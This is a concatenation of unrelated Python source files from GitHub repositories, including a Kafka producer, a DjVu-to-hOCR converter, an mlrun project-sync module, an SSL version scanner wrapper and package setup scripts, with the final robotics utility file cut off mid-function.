import datetime current_weight = 220 goal_weight = 180 average_lbs_week = 1.5 start_date = datetime.date.today() print('Today\'s Date is: {:%B %d, %Y}'.format(start_date)) end_date = start_date # print(end_date) while current_weight > goal_weight: end_date += datetime.timedelta(days=7) current_weight -= average_lbs_week print() print('Date to reach the goal is: {:%B %d, %Y}'.format(end_date)) print() print(f'Reached the goal in {(end_date - start_date).days // 7} weeks')
iampaavan/Pure_Python
Weekly_Goal.py
Weekly_Goal.py
py
506
python
en
code
1
github-code
36
36289747092
from kafka.producer import KafkaProducer TOPIC_NAME = "kafka.client.tutorial" # producer는 생성한 레코드를 전송하기 위해 전송하고자 하는 토픽을 알고 있어야 한다. BOOTSTRAP_SERVER_HOST = "kafka_tutorial:9092" # 전송하고자 하는 카프카 클러스터 서버의 host와 IP를 지정 KEY_SERIALIZER = str.encode VALUE_SERIALIZER = str.encode producer = KafkaProducer( bootstrap_servers=[BOOTSTRAP_SERVER_HOST], key_serializer=KEY_SERIALIZER, value_serializer=VALUE_SERIALIZER ) # test message with key test_message_key = "test" test_message_value = "testMessage for python with Kafka" # key_serializer 함수의 경우 None처리가 필요해보임(Spark udf와 같이) producer.send(topic=TOPIC_NAME, value=test_message_value, key=test_message_key) producer.flush() producer.close()
2h-kim/kafka-personal-study
simple-kafka-producer/kafka-producer-key-value.py
kafka-producer-key-value.py
py
833
python
ko
code
0
github-code
36
2356478535
from __future__ import print_function import argparse import cgi import locale import os import re import sys from .. import cli from .. import hocr from .. import ipc from .. import logger from .. import temporary from .. import text_zones from .. import unicode_support from .. import utils from .. import version from ..hocr import etree from ..text_zones import const from ..text_zones import sexpr __version__ = version.__version__ system_encoding = locale.getpreferredencoding() logger = logger.setup() class ArgumentParser(cli.ArgumentParser): def __init__(self): usage = '%(prog)s [options] FILE' cli.ArgumentParser.__init__(self, usage=usage) self.add_argument('--version', action=version.VersionAction) group = self.add_argument_group(title='input selection options') group.add_argument('path', metavar='FILE', help='DjVu file to covert') def pages(x): return utils.parse_page_numbers(x) group.add_argument('-p', '--pages', dest='pages', action='store', default=None, type=pages, help='pages to convert') group = self.add_argument_group(title='word segmentation options') group.add_argument('--word-segmentation', dest='word_segmentation', choices=('simple', 'uax29'), default='simple', help='word segmentation algorithm') # -l/--language is currently not very useful, as ICU don't have any specialisations for languages ocrodjvu supports: group.add_argument('-l', '--language', dest='language', help=argparse.SUPPRESS or 'language for word segmentation', default='eng') group = self.add_argument_group(title='HTML output options') group.add_argument('--title', dest='title', help='document title', default='DjVu hidden text layer') group.add_argument('--css', metavar='STYLE', dest='css', help='CSS style', default='') def parse_args(self, args=None, namespace=None): options = cli.ArgumentParser.parse_args(self, args, namespace) if options.word_segmentation == 'uax29': options.icu = icu = unicode_support.get_icu() options.locale = icu.Locale(options.language) else: options.icu = None 
options.locale = None return options class CharacterLevelDetails(Exception): pass class Zone(object): def __init__(self, sexpr, page_height): self._sexpr = sexpr self._page_height = page_height @property def type(self): return const.get_text_zone_type(self._sexpr[0].value) @property def bbox(self): return text_zones.BBox( self._sexpr[1].value, self._page_height - self._sexpr[4].value, self._sexpr[3].value, self._page_height - self._sexpr[2].value, ) @property def text(self): if len(self._sexpr) != 6: raise TypeError('list of {0} (!= 6) elements'.format(len(self._sexpr))) # no coverage if not isinstance(self._sexpr[5], sexpr.StringExpression): raise TypeError('last element is not a string') # no coverage return unicode(self._sexpr[5].value, 'UTF-8', 'replace') @property def children(self): for child in self._sexpr[5:]: if isinstance(child, sexpr.ListExpression): yield Zone(child, self._page_height) else: yield self.text return @property def n_children(self): n = len(self._sexpr) - 5 if n <= 0: raise TypeError('list of {0} (< 6) elements'.format(len(self._sexpr))) # no coverage return n def __repr__(self): return '{tp}({sexpr!r})'.format(tp=type(self).__name__, sexpr=self._sexpr) _xml_string_re = re.compile( u''' ([^\x00-\x08\x0B\x0C\x0E-\x1F]*) ( [\x00-\x08\x0B\x0C\x0E-\x1F]?) 
''', re.VERBOSE ) def set_text(element, text): last = None for match in _xml_string_re.finditer(text): if match.group(1): if last is None: element.text = match.group(1) else: last.tail = match.group(1) if match.group(2): last = etree.Element('span') last.set('class', 'djvu_char') last.set('title', '#x{0:02x}'.format(ord(match.group(2)))) last.text = ' ' element.append(last) def break_chars(char_zone_list, options): bbox_list = [] text = [] for char_zone in char_zone_list: bbox = char_zone.bbox char_text = char_zone.text if not char_text: continue for i, char in enumerate(char_text): subbox = text_zones.BBox( int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * i / len(char_text) + 0.5), bbox.y0, int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * (i + 1) / len(char_text) + 0.5), bbox.y1, ) bbox_list += [subbox] text += [char_text] text = str.join('', text) break_iterator = unicode_support.word_break_iterator(text, options.locale) element = None i = 0 for j in break_iterator: subtext = text[i:j] if subtext.isspace(): if element is not None: element.tail = ' ' i = j continue bbox = text_zones.BBox() for k in xrange(i, j): bbox.update(bbox_list[k]) element = etree.Element('span') element.set('class', 'ocrx_word') element.set('title', 'bbox {bbox}; bboxes {bboxes}'.format( bbox=str.join(' ', map(str, bbox)), bboxes=str.join(', ', (str.join(' ', map(str, bbox)) for bbox in bbox_list[i:j])) )) set_text(element, subtext) yield element i = j def break_plain_text(text, bbox, options): break_iterator = unicode_support.word_break_iterator(text, options.locale) i = 0 element = None for j in break_iterator: subtext = text[i:j] if subtext.isspace(): if element is not None: element.tail = ' ' i = j continue subbox = text_zones.BBox( int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * i / len(text) + 0.5), bbox.y0, int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * j / len(text) + 0.5), bbox.y1, ) element = etree.Element('span') element.set('class', 'ocrx_word') element.set('title', 'bbox ' + str.join(' ', map(str, 
subbox))) set_text(element, subtext) yield element i = j def process_zone(parent, zone, last, options): zone_type = zone.type if zone_type <= const.TEXT_ZONE_LINE and parent is not None: parent.tail = '\n' try: hocr_tag, hocr_class = hocr.djvu_zone_to_hocr(zone_type) except LookupError as ex: if ex[0] == const.TEXT_ZONE_CHARACTER: raise CharacterLevelDetails raise self = etree.Element(hocr_tag) self.set('class', hocr_class) if zone_type == const.TEXT_ZONE_PAGE: bbox = options.page_bbox else: bbox = zone.bbox self.set('title', 'bbox ' + str.join(' ', map(str, bbox))) n_children = zone.n_children character_level_details = False for n, child_zone in enumerate(zone.children): last_child = n == n_children - 1 if isinstance(child_zone, Zone): try: process_zone(self, child_zone, last=last_child, options=options) except CharacterLevelDetails: # Do word segmentation by hand. character_level_details = True break if character_level_details: # Do word segmentation by hand. child = None for child in break_chars(zone.children, options): parent.append(child) if child is not None and zone_type == const.TEXT_ZONE_WORD and not last: child.tail = ' ' self = None elif isinstance(child_zone, unicode): text = child_zone if zone_type >= const.TEXT_ZONE_WORD and options.icu is not None and parent is not None: # Do word segmentation by hand. child = None for child in break_plain_text(text, bbox, options): parent.append(child) if child is not None and zone_type == const.TEXT_ZONE_WORD and not last: child.tail = ' ' self = None else: # Word segmentation as provided by DjVu. # There's no point in doing word segmentation if only line coordinates are provided. 
set_text(self, text) if zone_type == const.TEXT_ZONE_WORD and not last: self.tail = ' ' if parent is not None and self is not None: parent.append(self) return self def process_page(page_text, options): result = process_zone(None, page_text, last=True, options=options) tree = etree.ElementTree(result) tree.write(sys.stdout, encoding='UTF-8') hocr_header_template = '''\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="ocr-system" content="{ocr_system}" /> <meta name="ocr-capabilities" content="{ocr_capabilities}" /> <style type="text/css">{css}</style> <title>{title}</title> </head> <body> ''' hocr_header_style_re = re.compile(r'^\s+<style\s.*?\n', re.MULTILINE) hocr_footer = ''' </body> </html> ''' def main(argv=sys.argv): options = ArgumentParser().parse_args(argv[1:]) logger.info('Converting {path}:'.format(path=utils.smart_repr(options.path, system_encoding))) if options.pages is None: djvused = ipc.Subprocess( ['djvused', '-e', 'n', os.path.abspath(options.path)], stdout=ipc.PIPE, ) try: n_pages = int(djvused.stdout.readline()) finally: djvused.wait() options.pages = xrange(1, n_pages + 1) page_iterator = iter(options.pages) sed_script = temporary.file(suffix='.djvused') for n in options.pages: print('select {0}; size; print-txt'.format(n), file=sed_script) sed_script.flush() djvused = ipc.Subprocess( ['djvused', '-f', sed_script.name, os.path.abspath(options.path)], stdout=ipc.PIPE, ) ocr_system = 'djvu2hocr {ver}'.format(ver=__version__) hocr_header = hocr_header_template.format( ocr_system=ocr_system, ocr_capabilities=str.join(' ', hocr.djvu2hocr_capabilities), title=cgi.escape(options.title), css=cgi.escape(options.css), ) if not options.css: hocr_header = re.sub(hocr_header_style_re, '', hocr_header, count=1) 
sys.stdout.write(hocr_header) for n in page_iterator: try: page_size = [ int(str(sexpr.Expression.from_stream(djvused.stdout).value).split('=')[1]) for i in xrange(2) ] options.page_bbox = text_zones.BBox(0, 0, page_size[0], page_size[1]) page_text = sexpr.Expression.from_stream(djvused.stdout) except sexpr.ExpressionSyntaxError: break logger.info('- Page #{n}'.format(n=n)) page_zone = Zone(page_text, page_size[1]) process_page(page_zone, options) sys.stdout.write(hocr_footer) djvused.wait() # vim:ts=4 sts=4 sw=4 et
jwilk-archive/ocrodjvu
lib/cli/djvu2hocr.py
djvu2hocr.py
py
11,591
python
en
code
41
github-code
36
22354363555
import datetime import traceback import typing import humanfriendly import mergedeep import pytz import sqlalchemy.orm import mlrun.common.schemas import mlrun.config import mlrun.errors import mlrun.utils import mlrun.utils.helpers import mlrun.utils.regex import mlrun.utils.singleton import server.api.crud import server.api.db.session import server.api.utils.auth.verifier import server.api.utils.clients.iguazio import server.api.utils.periodic import server.api.utils.projects.member as project_member import server.api.utils.projects.remotes.leader import server.api.utils.projects.remotes.nop_leader from mlrun.errors import err_to_str from mlrun.utils import logger class Member( project_member.Member, metaclass=mlrun.utils.singleton.AbstractSingleton, ): def initialize(self): logger.info("Initializing projects follower") self._leader_name = mlrun.mlconf.httpdb.projects.leader self._sync_session = None self._leader_client: server.api.utils.projects.remotes.leader.Member if self._leader_name == "iguazio": self._leader_client = server.api.utils.clients.iguazio.Client() if not mlrun.mlconf.httpdb.projects.iguazio_access_key: raise mlrun.errors.MLRunInvalidArgumentError( "Iguazio access key must be configured when the leader is Iguazio" ) self._sync_session = mlrun.mlconf.httpdb.projects.iguazio_access_key elif self._leader_name == "nop": self._leader_client = server.api.utils.projects.remotes.nop_leader.Member() else: raise NotImplementedError("Unsupported project leader") self._periodic_sync_interval_seconds = humanfriendly.parse_timespan( mlrun.mlconf.httpdb.projects.periodic_sync_interval ) self._synced_until_datetime = None # run one sync to start off on the right foot and fill out the cache but don't fail initialization on it try: # Basically the delete operation in our projects mechanism is fully consistent, meaning the leader won't # remove the project from its persistency (the source of truth) until it was successfully removed from all # followers. 
Therefore, when syncing projects from the leader, we don't need to search for the deletions # that may happen without us knowing about it (therefore full_sync by default is false). When we # introduced the chief/worker mechanism, we needed to change the follower to keep its projects in the DB # instead of in cache. On the switch, since we were using cache and the projects table in the DB was not # maintained, we know we may have projects that shouldn't be there anymore, ideally we would have trigger # the full sync only once on the switch, but since we don't have a good heuristic to identify the switch # we're doing a full_sync on every initialization full_sync = ( mlrun.mlconf.httpdb.clusterization.role == mlrun.common.schemas.ClusterizationRole.chief ) self._sync_projects(full_sync=full_sync) except Exception as exc: logger.warning( "Initial projects sync failed", exc=err_to_str(exc), traceback=traceback.format_exc(), ) self._start_periodic_sync() def shutdown(self): logger.info("Shutting down projects leader") self._stop_periodic_sync() def create_project( self, db_session: sqlalchemy.orm.Session, project: mlrun.common.schemas.Project, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, commit_before_get: bool = False, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): server.api.crud.Projects().create_project(db_session, project) return project, False else: is_running_in_background = self._leader_client.create_project( leader_session, project, wait_for_completion ) created_project = None if not is_running_in_background: # as part of the store_project flow we encountered an error related to the isolation level we use. 
# We use the default isolation level, I wasn't able to find exactly what is the default that sql alchemy # sets but its serializable(once you SELECT a series of rows in a transaction, you will get the # identical data back each time you re-emit that SELECT) or repeatable read isolation (you’ll see newly # added rows (and no longer see deleted rows), but for rows that you’ve already loaded, you won’t see # any change). Eventually, in the store_project flow, we already queried get_project and at the second # time(below), after the project created, we failed because we got the same result from first query. # Using session.commit ends the current transaction and start a new one which will result in a # new query to the DB. # for further read: https://docs-sqlalchemy.readthedocs.io/ko/latest/faq/sessions.html # https://docs-sqlalchemy.readthedocs.io/ko/latest/dialects/mysql.html#transaction-isolation-level # https://dev.mysql.com/doc/refman/8.0/en/innodb-transaction-isolation-levels.html # TODO: there are multiple isolation level we can choose, READ COMMITTED seems to solve our issue # but will require deeper investigation and more test coverage if commit_before_get: db_session.commit() created_project = self.get_project( db_session, project.metadata.name, leader_session ) return created_project, is_running_in_background def store_project( self, db_session: sqlalchemy.orm.Session, name: str, project: mlrun.common.schemas.Project, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): server.api.crud.Projects().store_project(db_session, name, project) return project, False else: try: self.get_project(db_session, name, leader_session) except mlrun.errors.MLRunNotFoundError: return self.create_project( db_session, project, projects_role, leader_session, 
wait_for_completion, commit_before_get=True, ) else: self._leader_client.update_project(leader_session, name, project) return self.get_project(db_session, name, leader_session), False def patch_project( self, db_session: sqlalchemy.orm.Session, name: str, project: dict, patch_mode: mlrun.common.schemas.PatchMode = mlrun.common.schemas.PatchMode.replace, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): # No real scenario for this to be useful currently - in iguazio patch is transformed to store request raise NotImplementedError("Patch operation not supported from leader") else: current_project = self.get_project(db_session, name, leader_session) strategy = patch_mode.to_mergedeep_strategy() current_project_dict = current_project.dict(exclude_unset=True) mergedeep.merge(current_project_dict, project, strategy=strategy) patched_project = mlrun.common.schemas.Project(**current_project_dict) return self.store_project( db_session, name, patched_project, projects_role, leader_session, wait_for_completion, ) def delete_project( self, db_session: sqlalchemy.orm.Session, name: str, deletion_strategy: mlrun.common.schemas.DeletionStrategy = mlrun.common.schemas.DeletionStrategy.default(), projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, auth_info: mlrun.common.schemas.AuthInfo = mlrun.common.schemas.AuthInfo(), wait_for_completion: bool = True, ) -> bool: if self._is_request_from_leader(projects_role): server.api.crud.Projects().delete_project( db_session, name, deletion_strategy ) else: return self._leader_client.delete_project( auth_info.session, name, deletion_strategy, wait_for_completion, ) return False def get_project( self, db_session: sqlalchemy.orm.Session, name: str, leader_session: typing.Optional[str] = None, ) -> 
mlrun.common.schemas.Project: return server.api.crud.Projects().get_project(db_session, name) def get_project_owner( self, db_session: sqlalchemy.orm.Session, name: str, ) -> mlrun.common.schemas.ProjectOwner: return self._leader_client.get_project_owner(self._sync_session, name) def list_projects( self, db_session: sqlalchemy.orm.Session, owner: str = None, format_: mlrun.common.schemas.ProjectsFormat = mlrun.common.schemas.ProjectsFormat.full, labels: typing.List[str] = None, state: mlrun.common.schemas.ProjectState = None, # needed only for external usage when requesting leader format projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, names: typing.Optional[typing.List[str]] = None, ) -> mlrun.common.schemas.ProjectsOutput: if ( format_ == mlrun.common.schemas.ProjectsFormat.leader and not self._is_request_from_leader(projects_role) ): raise mlrun.errors.MLRunAccessDeniedError( "Leader format is allowed only to the leader" ) projects_output = server.api.crud.Projects().list_projects( db_session, owner, format_, labels, state, names ) if format_ == mlrun.common.schemas.ProjectsFormat.leader: leader_projects = [ self._leader_client.format_as_leader_project(project) for project in projects_output.projects ] projects_output.projects = leader_projects return projects_output async def list_project_summaries( self, db_session: sqlalchemy.orm.Session, owner: str = None, labels: typing.List[str] = None, state: mlrun.common.schemas.ProjectState = None, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, names: typing.Optional[typing.List[str]] = None, ) -> mlrun.common.schemas.ProjectSummariesOutput: return await server.api.crud.Projects().list_project_summaries( db_session, owner, labels, state, names ) async def get_project_summary( self, db_session: sqlalchemy.orm.Session, name: str, leader_session: typing.Optional[str] = None, ) -> 
mlrun.common.schemas.ProjectSummary: return await server.api.crud.Projects().get_project_summary(db_session, name) def _start_periodic_sync(self): # the > 0 condition is to allow ourselves to disable the sync from configuration if self._periodic_sync_interval_seconds > 0: logger.info( "Starting periodic projects sync", interval=self._periodic_sync_interval_seconds, ) server.api.utils.periodic.run_function_periodically( self._periodic_sync_interval_seconds, self._sync_projects.__name__, False, self._sync_projects, ) def _stop_periodic_sync(self): server.api.utils.periodic.cancel_periodic_function(self._sync_projects.__name__) def _sync_projects(self, full_sync=False): """ :param full_sync: when set to true, in addition to syncing project creation/updates from the leader, we will also sync deletions that may occur without updating us the follower """ db_session = server.api.db.session.create_session() try: leader_projects, latest_updated_at = self._list_projects_from_leader() db_projects = server.api.crud.Projects().list_projects(db_session) self._store_projects_from_leader(db_session, db_projects, leader_projects) if full_sync: self._archive_projects_missing_from_leader( db_session, db_projects, leader_projects ) self._update_latest_synced_datetime(latest_updated_at) finally: server.api.db.session.close_session(db_session) def _list_projects_from_leader(self): try: leader_projects, latest_updated_at = self._leader_client.list_projects( self._sync_session, self._synced_until_datetime ) except Exception: # if we failed to get projects from the leader, we'll try get all the # projects without the updated_at filter leader_projects, latest_updated_at = self._leader_client.list_projects( self._sync_session ) return leader_projects, latest_updated_at def _store_projects_from_leader(self, db_session, db_projects, leader_projects): db_projects_names = [project.metadata.name for project in db_projects.projects] # Don't add projects in non-terminal state if they didn't exist 
before to prevent race conditions filtered_projects = [] for leader_project in leader_projects: if ( leader_project.status.state not in mlrun.common.schemas.ProjectState.terminal_states() and leader_project.metadata.name not in db_projects_names ): continue filtered_projects.append(leader_project) for project in filtered_projects: # if a project was previously archived, it's state will be overriden by the leader # and returned to normal here. server.api.crud.Projects().store_project( db_session, project.metadata.name, project ) def _archive_projects_missing_from_leader( self, db_session, db_projects, leader_projects ): logger.info("Performing full sync") leader_project_names = [project.metadata.name for project in leader_projects] projects_to_archive = { project.metadata.name: project for project in db_projects.projects } for project_name in leader_project_names: if project_name in projects_to_archive: del projects_to_archive[project_name] for project_to_archive in projects_to_archive: logger.info( "Found project in the DB that is not in leader. 
Archiving...", name=project_to_archive, ) try: projects_to_archive[ project_to_archive ].status.state = mlrun.common.schemas.ProjectState.archived server.api.crud.Projects().patch_project( db_session, project_to_archive, projects_to_archive[project_to_archive].dict(), ) except Exception as exc: logger.warning( "Failed to archive project from DB, continuing...", name=project_to_archive, exc=err_to_str(exc), ) def _update_latest_synced_datetime(self, latest_updated_at): if latest_updated_at: # sanity and defensive programming - if the leader returned a latest_updated_at that is older # than the epoch, we'll set it to the epoch epoch = pytz.UTC.localize(datetime.datetime.utcfromtimestamp(0)) if latest_updated_at < epoch: latest_updated_at = epoch self._synced_until_datetime = latest_updated_at def _is_request_from_leader( self, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] ) -> bool: if projects_role and projects_role.value == self._leader_name: return True return False @staticmethod def _is_project_matching_labels( labels: typing.List[str], project: mlrun.common.schemas.Project ): if not project.metadata.labels: return False for label in labels: if "=" in label: name, value = [v.strip() for v in label.split("=", 1)] if name not in project.metadata.labels: return False return value == project.metadata.labels[name] else: return label in project.metadata.labels
mlrun/mlrun
server/api/utils/projects/follower.py
follower.py
py
18,072
python
en
code
1,129
github-code
36
5462088920
import cv2 import numpy as np import logging from skimage import io import time from multiprocessing import Lock mutex = Lock() class AClassify: def __init__(self,uuid,net,image,s_client): logging.debug("intialisation is requested") self.url = s_client.generate_presigned_url(ClientMethod='get_object',Params={'Bucket':'data.ibeyonde','Key':image}) self.image = io.imread(self.url) self.preds = None self.blob = cv2.dnn.blobFromImage(self.image, 1, (224, 224), (104, 117, 123)) self.net = net self.idxs = None self.new_label = [] self.uuid = uuid def compute(self,classes): logging.debug("Aclassify computation is requested") global mutex mutex.acquire() logging.info("lock acquired by thread") self.net.setInput(self.blob) start = time.time() self.preds = self.net.forward() end = time.time() logging.info("[INFO] analytics took {:.5} seconds".format(end - start)) self.idxs = np.argsort(self.preds[0])[::-1][:5] logging.info(self.idxs) for idx in self.idxs: label = classes[idx] if label.endswith('\r'): label = label[:-1] self.new_label.append({label:self.preds[0][idx]}) mutex.release() logging.info("lock relased by thread") return self.uuid,self.new_label
gitibeyonde/pyms
lib/AnalyticsClassify.py
AnalyticsClassify.py
py
1,480
python
en
code
0
github-code
36
6999547749
# Functions to calculate optical flow import opyf import utils def analyze_frames(element): dir = "/media/madziegielewska/Seagate Expansion Drive/Diploma-Project/" analyzer = opyf.frameSequenceAnalyzer(f"{dir}Demo-App/static/segmentation_results/{element}") num = analyzer.number_of_frames utils.delete_files_in_directory(f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.writeGoodFeaturesPositionsAndDisplacements(fileFormat='csv', outFolder=f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.extractGoodFeaturesPositionsDisplacementsAndInterpolate() analyzer.writeVelocityField(fileFormat='csv', outFolder=f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.set_vecTime(Ntot=num-1,shift=1,step=1) analyzer.extractGoodFeaturesAndDisplacements(display='quiver', displayColor=True, saveImgPath=f"{dir}/Demo-App/static/opyflow_results/{element}", width=0.005) utils.convert_frames_to_video(f'{element}.mp4', element, 10)
mdziegielewska/Diploma-Project
Demo-App/opticalflow.py
opticalflow.py
py
994
python
en
code
0
github-code
36
16912146541
""" Setup Module for Blob Creator Author: Michael Kohlegger Date: 2021-09 """ import setuptools with open("README.md", "r", encoding="utf8") as readme_file: readme = readme_file.read() with open('requirements.txt', "r", encoding="utf8") as requirement_file: requirements = requirement_file.read().splitlines() setuptools.setup( name='blob_creator', version='3.2.5', author="Michael Kohlegger", author_email="michael@datenberge.org", description="Package to create dummy datasets for analysis tasks", long_description=readme, long_description_content_type="text/markdown", url = "https://github.com/mckoh/blob_creator", project_urls={ "Bug Tracker": "https://github.com/mckoh/blob_creator/issues", }, classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], package_dir={"": "src"}, packages=setuptools.find_packages(where="src"), python_requires=">=3.6", install_requires=requirements )
mckoh/blob_creator
setup.py
setup.py
py
1,076
python
en
code
1
github-code
36
3511755621
import random print("Infinity Dice") def infinityDice(): running = True while running: sides = int(input("How many sides do you want?: ")) roll = random.randint(1,sides) print(f"You rolled {roll}") if input("Do you want to roll again? (y/n):") == "n": exit() infinityDice()
tanapolark/100_days_coding_python
day_24_def_2.py
day_24_def_2.py
py
303
python
en
code
0
github-code
36
20766513047
import sslscan
from sslscan import modules
from sslscan.module.scan import BaseScan


class SSLScanScanner:
    """Thin wrapper around sslscan's Scanner for probing a single target."""

    def __init__(self, target):
        # Host to probe; one Scanner instance is created up front and reused.
        self.target = target
        self.scanner = sslscan.Scanner()

    def scan(self):
        """Scan the target and print each SSL version by result category."""
        self.scanner.scan(self.target)
        # (label template, result attribute) pairs, reported in this order
        # for every scanned server.
        categories = (
            ("Accepted: %s", "accepted_ssl_versions"),
            ("Rejected: %s", "rejected_ssl_versions"),
            ("Failed: %s", "failed_ssl_versions"),
        )
        for server in self.scanner.get_results():
            for template, attribute in categories:
                for ssl_version in getattr(server, attribute):
                    print(template % ssl_version)
shadowaxe99/MORE-AGENTS
cybersecurity_scanner/sslscan_scanner/sslscan_scanner.py
sslscan_scanner.py
py
655
python
en
code
0
github-code
36
34353630412
import dash_pivottable
import dash_html_components as html


def make_pivot_table(df):
    """Build a scrollable Dash pivot-table component from DataFrame *df*.

    Keeps only the soil-survey columns of interest, drops incomplete rows,
    and wraps the resulting PivotTable in a styled Div.
    """
    selected_columns = [
        "CLIMA_AMBIENTAL",
        "PAISAJE",
        "CODIGO",
        "TIPO_RELIEVE",
        "FORMA_TERRENO",
        "MATERIAL_PARENTAL_LITOLOGIA",
        "ORDEN",
    ]
    clean_df = df[selected_columns].dropna()
    # PivotTable expects a header row followed by the data rows.
    table_data = [list(clean_df)] + clean_df.to_numpy().tolist()
    pivot = dash_pivottable.PivotTable(
        data=table_data,
        cols=[],
        rows=[
            "CLIMA_AMBIENTAL",
            "PAISAJE",
            "TIPO_RELIEVE",
            "FORMA_TERRENO",
            "MATERIAL_PARENTAL_LITOLOGIA",
            "ORDEN",
        ],
        vals=["CODIGO"],
    )
    return html.Div(
        pivot,
        style={
            "height": "700px",
            "width": "99%",
            "overflow": "scroll",
            "resize": "both",
            "align": "center",
        },
    )
DS4A-Team19-2021/Agustin-Codazzi-Project
apps/utils/utils_pivot_table.py
utils_pivot_table.py
py
782
python
en
code
1
github-code
36
28037620802
from setuptools import find_packages, setup

# read the contents of README file
from os import path
from io import open  # for Python 2 and 3 compatibility

# get __version__ from _version.py (executed so this file needs no import
# of the package itself at build time)
ver_file = path.join('tensorpi', 'version.py')
with open(ver_file) as f:
    exec(f.read())

this_directory = path.abspath(path.dirname(__file__))


# read the contents of README.md
def readme():
    """Return the long description loaded from README.md."""
    with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
        return f.read()


# read the contents of requirements.txt
with open(path.join(this_directory, 'requirements.txt'), encoding='utf-8') as f:
    requirements = f.read().splitlines()

setup(
    name='tensorpi',
    version=__version__,
    description='Python library for low-rank tensor learning',
    long_description=readme(),
    # README.md is Markdown, so declare it as such; it was previously
    # mislabeled 'text/x-rst', which makes PyPI render the page incorrectly.
    long_description_content_type='text/markdown',
    author='Xinyu Chen',
    author_email='chenxy346@gmail.com',
    url='https://github.com/xinychen/tensorpi',
    download_url='https://github.com/xinychen/tensorpi/archive/master.zip',
    keywords=['tensor learning', 'tensor computation', 'matrix completion',
              'tensor completion'],
    packages=find_packages(exclude=['test']),
    include_package_data=True,
    install_requires=requirements,
    setup_requires=['setuptools>=38.6.0'],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Education',
        'Intended Audience :: Financial and Insurance Industry',
        'Intended Audience :: Science/Research',
        'Intended Audience :: Developers',
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
)
xinychen/TensorPi
setup.py
setup.py
py
1,800
python
en
code
3
github-code
36
24011968546
# -------------------------------------------------------- # Licensed under The MIT License [see LICENSE for details] # -------------------------------------------------------- import numpy as np import os import sys from transforms3d.quaternions import * from transforms3d.euler import * from transforms3d.axangles import * import random from tensorboardX import SummaryWriter from scipy.spatial import cKDTree import scipy.io as sio import IPython import time from torch import nn from torch import optim import torch import torch.nn.functional as F from torch.optim import Adam from collections import deque import tabulate import cv2 import matplotlib.pyplot as plt import yaml import core import copy import math from easydict import EasyDict as edict from pointnet2_ops.pointnet2_utils import furthest_point_sample, gather_operation import colorsys import psutil import GPUtil from core.common_utils import * import pybullet as p HAS_PLANNER_INSTALLED = True try: from OMG.ycb_render.robotPose import robot_pykdl except: HAS_PLANNER_INSTALLED = False # global variables V = cam_V = [[-0.9351, 0.3518, 0.0428, 0.3037], [0.2065, 0.639, -0.741, 0.132], [-0.2881, -0.684, -0.6702, 1.8803], [0.0, 0.0, 0.0, 1.0]] hand_finger_point = np.array([ [ 0., 0., 0. , -0. , 0. , -0. 
], [ 0., 0., 0.053, -0.053, 0.053, -0.053], [ 0., 0., 0.075, 0.075, 0.105, 0.105]]) anchor_seeds = np.array([ [0.0, -1.285, 0, -2.356, 0.0, 1.571, 0.785], [2.5, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2.8, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2.5, 0.83, -2.89, -1.69, 0.056, 1.46, -1.27], [0.049, 1.22, -1.87, -0.67, 2.12, 0.99, -0.85], [-2.28, -0.43, 2.47, -1.35, 0.62, 2.28, -0.27], [-2.02, -1.29, 2.20, -0.83, 0.22, 1.18, 0.74], [-2.2, 0.03, -2.89, -1.69, 0.056, 1.46, -1.27], [-2.5, -0.71, -2.73, -0.82, -0.7, 0.62, -0.56], [-2, -0.71, -2.73, -0.82, -0.7, 0.62, -0.56], [-2.66, -0.55, 2.06, -1.77, 0.96, 1.77, -1.35], [1.51, -1.48, -1.12, -1.55, -1.57, 1.15, 0.24], [-2.61, -0.98, 2.26, -0.85, 0.61, 1.64, 0.23] ]) renderer = None robot = None robot_points = None panda = None panda_clients = [] def require_panda(num=1): global panda, panda_clients if panda is None: from env.panda_gripper_hand_camera import Panda import pybullet_utils.bullet_client as bc panda_clients = [bc.BulletClient(connection_mode=p.DIRECT) for i in range(num)] panda = [Panda(stepsize=1./ 1000., base_shift=[-0.05, 0.0, 10.], bullet_client=panda_clients[i]) for i in range(num)] # -0.65 return panda, panda_clients def require_robot(new=False): if new: return robot_pykdl.robot_kinematics(None, data_path='../../../') global robot if robot is None: robot = robot_pykdl.robot_kinematics(None, data_path='../../../') return robot def require_renderer(large_fov=False, offset=False ): global renderer, robot 